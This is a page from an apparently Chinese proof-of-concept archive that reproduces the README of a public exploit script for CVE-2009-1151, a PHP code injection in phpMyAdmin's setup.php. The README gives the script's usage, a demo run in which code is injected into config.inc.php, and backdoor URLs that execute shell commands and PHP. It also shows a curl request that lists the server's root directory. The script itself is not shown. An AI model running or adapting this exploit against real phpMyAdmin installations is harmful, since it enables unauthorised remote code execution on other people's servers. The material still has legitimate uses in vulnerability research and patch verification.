关联漏洞
描述
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)
介绍
# minervais.com.phpMyAdminRCE.sh
phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE POC. This was the first publicly-released exploit for CVE-2009-1151.
## Syntax
```
$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh <phpMyAdmin_base_URL>
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/
```
## Demo
```
$ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign_goes_here>gmail.com
```
## Post-injection RCE:
```
$ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
_[partial output removed for brevity reasons]_
```
文件快照
[4.0K] /data/pocs/c3edf78c7c8dbeaa757733bf0ec8bc201f7ce938
├── [ 34K] calc.xls
├── [4.2K] minervais.com.phpMyAdminRCE.sh
└── [1.5K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。